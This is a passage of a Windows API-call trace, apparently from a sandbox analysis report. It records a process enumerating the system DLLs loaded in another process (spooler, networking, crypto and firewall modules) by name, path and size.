(in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0071.094] CoTaskMemFree (pv=0xd910e0) [0071.094] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.094] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0071.096] CoTaskMemFree (pv=0xd910e0) [0071.096] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x24c6aa0, cb=0x18 | out: lpmodinfo=0x24c6aa0*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0071.098] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.098] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0071.101] CoTaskMemFree (pv=0xd910e0) [0071.101] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.101] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0071.103] CoTaskMemFree (pv=0xd910e0) [0071.103] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9530000, lpmodinfo=0x24c8c60, cb=0x18 | out: lpmodinfo=0x24c8c60*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0071.106] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.106] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9530000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0071.109] CoTaskMemFree (pv=0xd910e0) [0071.109] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.109] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9530000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0071.111] CoTaskMemFree (pv=0xd910e0) [0071.111] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac50000, lpmodinfo=0x24cae30, cb=0x18 | out: lpmodinfo=0x24cae30*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0071.114] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.114] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0071.117] CoTaskMemFree (pv=0xd910e0) [0071.117] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.117] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0071.119] CoTaskMemFree (pv=0xd910e0) [0071.119] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x24cd000, cb=0x18 | out: lpmodinfo=0x24cd000*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0071.122] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.122] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0071.129] CoTaskMemFree (pv=0xd910e0) [0071.129] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.129] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0071.132] CoTaskMemFree (pv=0xd910e0) [0071.132] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa0a0000, lpmodinfo=0x24cf1d8, cb=0x18 | out: lpmodinfo=0x24cf1d8*(lpBaseOfDll=0x7fefa0a0000, SizeOfImage=0x13000, EntryPoint=0x7fefa0ac390)) returned 1 [0071.134] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.134] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa0a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="umb.dll") returned 0x7 [0071.137] CoTaskMemFree (pv=0xd910e0) [0071.137] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.137] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa0a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\umb.dll" (normalized: "c:\\windows\\system32\\umb.dll")) returned 0x1b [0071.140] CoTaskMemFree (pv=0xd910e0) [0071.140] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb350000, lpmodinfo=0x24d1388, cb=0x18 | out: lpmodinfo=0x24d1388*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0071.146] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.146] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0071.149] CoTaskMemFree (pv=0xd910e0) [0071.149] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.149] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0071.152] CoTaskMemFree (pv=0xd910e0) [0071.152] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x24d3538, cb=0x18 | out: lpmodinfo=0x24d3538*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0071.155] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.155] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0071.158] CoTaskMemFree (pv=0xd910e0) [0071.158] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.158] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0071.161] CoTaskMemFree (pv=0xd910e0) [0071.161] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x24d5708, cb=0x18 | out: lpmodinfo=0x24d5708*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0071.164] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.164] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0071.167] CoTaskMemFree (pv=0xd910e0) [0071.167] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.167] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0071.171] CoTaskMemFree (pv=0xd910e0) [0071.171] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x24d78c8, cb=0x18 | out: lpmodinfo=0x24d78c8*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0071.174] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.174] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0071.177] CoTaskMemFree (pv=0xd910e0) [0071.177] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.177] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0071.180] CoTaskMemFree (pv=0xd910e0) [0071.180] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9fb0000, lpmodinfo=0x24d9a88, cb=0x18 | out: lpmodinfo=0x24d9a88*(lpBaseOfDll=0x7fef9fb0000, SizeOfImage=0xee000, EntryPoint=0x7fef9fc87d4)) returned 1 [0071.183] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.183] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9fb0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="localspl.dll") returned 0xc [0071.192] CoTaskMemFree (pv=0xd910e0) [0071.192] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.192] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9fb0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\localspl.dll" (normalized: "c:\\windows\\system32\\localspl.dll")) returned 0x20 [0071.195] CoTaskMemFree (pv=0xd910e0) [0071.195] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9f90000, lpmodinfo=0x24dbc58, cb=0x18 | out: lpmodinfo=0x24dbc58*(lpBaseOfDll=0x7fef9f90000, SizeOfImage=0x12000, EntryPoint=0x7fef9f91064)) returned 1 [0071.198] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.198] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9f90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SPOOLSS.DLL") returned 0xb [0071.201] CoTaskMemFree (pv=0xd910e0) [0071.201] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.201] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9f90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SPOOLSS.DLL" (normalized: "c:\\windows\\system32\\spoolss.dll")) returned 0x1f [0071.204] CoTaskMemFree (pv=0xd910e0) [0071.204] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd570000, lpmodinfo=0x24dde18, cb=0x18 | out: lpmodinfo=0x24dde18*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0071.207] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.207] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd570000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0071.210] CoTaskMemFree (pv=0xd910e0) [0071.210] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.210] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd570000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0071.214] CoTaskMemFree (pv=0xd910e0) [0071.214] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb890000, lpmodinfo=0x24dffd8, cb=0x18 | out: lpmodinfo=0x24dffd8*(lpBaseOfDll=0x7fefb890000, SizeOfImage=0x71000, EntryPoint=0x7fefb8cecc4)) returned 1 [0071.224] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.224] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb890000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="winspool.drv") returned 0xc [0071.227] CoTaskMemFree (pv=0xd910e0) [0071.227] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.227] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb890000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")) returned 0x20 [0071.230] CoTaskMemFree (pv=0xd910e0) [0071.230] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9f80000, lpmodinfo=0x24e21a8, cb=0x18 | out: lpmodinfo=0x24e21a8*(lpBaseOfDll=0x7fef9f80000, SizeOfImage=0x10000, EntryPoint=0x7fef9f88a48)) returned 1 [0071.234] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.234] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9f80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PrintIsolationProxy.dll") returned 0x17 [0071.237] CoTaskMemFree (pv=0xd910e0) [0071.237] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.237] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9f80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\PrintIsolationProxy.dll" (normalized: "c:\\windows\\system32\\printisolationproxy.dll")) returned 0x2b [0071.240] CoTaskMemFree (pv=0xd910e0) [0071.240] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9f70000, lpmodinfo=0x24e4398, cb=0x18 | out: lpmodinfo=0x24e4398*(lpBaseOfDll=0x7fef9f70000, SizeOfImage=0xe000, EntryPoint=0x7fef9f782c4)) returned 1 [0071.243] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.243] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9f70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FXSMON.DLL") returned 0xa [0071.247] CoTaskMemFree (pv=0xd910e0) [0071.247] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.247] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9f70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\FXSMON.DLL" (normalized: "c:\\windows\\system32\\fxsmon.dll")) returned 0x1e [0071.250] CoTaskMemFree (pv=0xd910e0) [0071.251] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9f10000, lpmodinfo=0x24e6558, cb=0x18 | out: lpmodinfo=0x24e6558*(lpBaseOfDll=0x7fef9f10000, SizeOfImage=0x34000, EntryPoint=0x7fef9f12f78)) returned 1 [0071.254] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.254] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9f10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="tcpmon.dll") returned 0xa [0071.257] CoTaskMemFree (pv=0xd910e0) [0071.257] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.257] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9f10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\tcpmon.dll" (normalized: "c:\\windows\\system32\\tcpmon.dll")) returned 0x1e [0071.260] CoTaskMemFree (pv=0xd910e0) [0071.260] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3a70000, lpmodinfo=0x24e8718, cb=0x18 | out: lpmodinfo=0x24e8718*(lpBaseOfDll=0x7fef3a70000, SizeOfImage=0xb000, EntryPoint=0x7fef3a75390)) returned 1 [0071.296] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.296] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3a70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="snmpapi.dll") returned 0xb [0071.299] CoTaskMemFree (pv=0xd910e0) [0071.299] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.299] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3a70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\snmpapi.dll" (normalized: "c:\\windows\\system32\\snmpapi.dll")) returned 0x1f [0071.303] CoTaskMemFree (pv=0xd910e0) [0071.303] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3a50000, lpmodinfo=0x24ea8d8, cb=0x18 | out: lpmodinfo=0x24ea8d8*(lpBaseOfDll=0x7fef3a50000, SizeOfImage=0x14000, EntryPoint=0x7fef3a5111c)) returned 1 [0071.306] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.306] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3a50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wsnmp32.dll") returned 0xb [0071.310] CoTaskMemFree (pv=0xd910e0) [0071.310] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.310] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3a50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wsnmp32.dll" (normalized: "c:\\windows\\system32\\wsnmp32.dll")) returned 0x1f [0071.314] CoTaskMemFree (pv=0xd910e0) [0071.314] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3af0000, lpmodinfo=0x24eca98, cb=0x18 | out: lpmodinfo=0x24eca98*(lpBaseOfDll=0x7fef3af0000, SizeOfImage=0x1f2000, EntryPoint=0x7fef3af101c)) returned 1 [0071.317] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.317] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3af0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msxml6.dll") returned 0xa [0071.321] CoTaskMemFree (pv=0xd910e0) [0071.321] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.321] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3af0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")) returned 0x1e [0071.325] CoTaskMemFree (pv=0xd910e0) [0071.325] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x24eec58, cb=0x18 | out: lpmodinfo=0x24eec58*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0071.328] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.328] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0071.332] CoTaskMemFree (pv=0xd910e0) [0071.332] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.332] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0071.336] CoTaskMemFree (pv=0xd910e0) [0071.336] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9f60000, lpmodinfo=0x24f0e18, cb=0x18 | out: lpmodinfo=0x24f0e18*(lpBaseOfDll=0x7fef9f60000, SizeOfImage=0xf000, EntryPoint=0x7fef9f6141c)) returned 1 [0071.339] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.339] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9f60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="usbmon.dll") returned 0xa [0071.344] CoTaskMemFree (pv=0xd910e0) [0071.344] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.344] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9f60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\usbmon.dll" (normalized: "c:\\windows\\system32\\usbmon.dll")) returned 0x1e [0071.347] CoTaskMemFree (pv=0xd910e0) [0071.347] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9f50000, lpmodinfo=0x24f2fd8, cb=0x18 | out: lpmodinfo=0x24f2fd8*(lpBaseOfDll=0x7fef9f50000, SizeOfImage=0x7000, EntryPoint=0x7fef9f519a4)) returned 1 [0071.351] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.351] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9f50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wls0wndh.dll") returned 0xc [0071.355] CoTaskMemFree (pv=0xd910e0) [0071.355] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.355] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9f50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wls0wndh.dll" (normalized: "c:\\windows\\system32\\wls0wndh.dll")) returned 0x20 [0071.359] CoTaskMemFree (pv=0xd910e0) [0071.359] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3970000, lpmodinfo=0x24f51c0, cb=0x18 | out: lpmodinfo=0x24f51c0*(lpBaseOfDll=0x7fef3970000, SizeOfImage=0x3a000, EntryPoint=0x7fef39913b4)) returned 1 [0071.363] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.363] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WSDMon.dll") returned 0xa [0071.367] CoTaskMemFree (pv=0xd910e0) [0071.367] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.367] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WSDMon.dll" (normalized: "c:\\windows\\system32\\wsdmon.dll")) returned 0x1e [0071.371] CoTaskMemFree (pv=0xd910e0) [0071.371] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef39b0000, lpmodinfo=0x24f7380, cb=0x18 | out: lpmodinfo=0x24f7380*(lpBaseOfDll=0x7fef39b0000, SizeOfImage=0x91000, EntryPoint=0x7fef39b237c)) returned 1 [0071.375] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.375] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef39b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wsdapi.dll") returned 0xa [0071.380] CoTaskMemFree (pv=0xd910e0) [0071.380] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.380] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef39b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wsdapi.dll" (normalized: "c:\\windows\\system32\\wsdapi.dll")) returned 0x1e [0071.384] CoTaskMemFree (pv=0xd910e0) [0071.384] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3850000, lpmodinfo=0x24f9540, cb=0x18 | out: lpmodinfo=0x24f9540*(lpBaseOfDll=0x7fef3850000, SizeOfImage=0x11f000, EntryPoint=0x7fef3851048)) returned 1 [0071.387] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.387] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3850000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="webservices.dll") returned 0xf [0071.392] CoTaskMemFree (pv=0xd910e0) [0071.392] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.392] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3850000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")) returned 0x23 [0071.396] CoTaskMemFree (pv=0xd910e0) [0071.396] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc950000, lpmodinfo=0x24fb710, cb=0x18 | out: lpmodinfo=0x24fb710*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0071.400] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.400] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc950000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0071.403] CoTaskMemFree (pv=0xd910e0) [0071.404] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.404] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc950000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0071.408] CoTaskMemFree (pv=0xd910e0) [0071.408] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x24fd8e0, cb=0x18 | out: lpmodinfo=0x24fd8e0*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0071.411] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.411] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0071.415] CoTaskMemFree (pv=0xd910e0) [0071.416] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.416] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0071.420] CoTaskMemFree (pv=0xd910e0) [0071.420] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3a90000, lpmodinfo=0x24ffaa0, cb=0x18 | out: lpmodinfo=0x24ffaa0*(lpBaseOfDll=0x7fef3a90000, SizeOfImage=0x33000, EntryPoint=0x7fef3a94cfc)) returned 1 [0071.424] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.424] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3a90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FunDisc.dll") returned 0xb [0071.429] CoTaskMemFree (pv=0xd910e0) [0071.429] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.429] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3a90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FunDisc.dll" (normalized: "c:\\windows\\system32\\fundisc.dll")) returned 0x1f [0071.433] CoTaskMemFree (pv=0xd910e0) [0071.433] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac40000, lpmodinfo=0x2501c60, cb=0x18 | out: lpmodinfo=0x2501c60*(lpBaseOfDll=0x7fefac40000, SizeOfImage=0x10000, EntryPoint=0x7fefac49c20)) returned 1 [0071.437] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.437] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fdPnp.dll") returned 0x9 [0071.441] CoTaskMemFree (pv=0xd910e0) [0071.441] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.441] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\fdPnp.dll" (normalized: "c:\\windows\\system32\\fdpnp.dll")) returned 0x1d [0071.446] CoTaskMemFree (pv=0xd910e0) [0071.446] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3a80000, lpmodinfo=0x2503e20, cb=0x18 | out: lpmodinfo=0x2503e20*(lpBaseOfDll=0x7fef3a80000, SizeOfImage=0xe000, EntryPoint=0x7fef3a81020)) returned 1 [0071.450] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.450] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3a80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="winprint.dll") returned 0xc [0071.454] CoTaskMemFree (pv=0xd910e0) [0071.454] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.454] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3a80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\spool\\PRTPROCS\\x64\\winprint.dll" (normalized: "c:\\windows\\system32\\spool\\prtprocs\\x64\\winprint.dll")) returned 0x33 [0071.458] CoTaskMemFree (pv=0xd910e0) [0071.458] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb20000, lpmodinfo=0x2506010, cb=0x18 | out: lpmodinfo=0x2506010*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0071.462] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.462] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0071.467] CoTaskMemFree (pv=0xd910e0) [0071.467] CoTaskMemAlloc 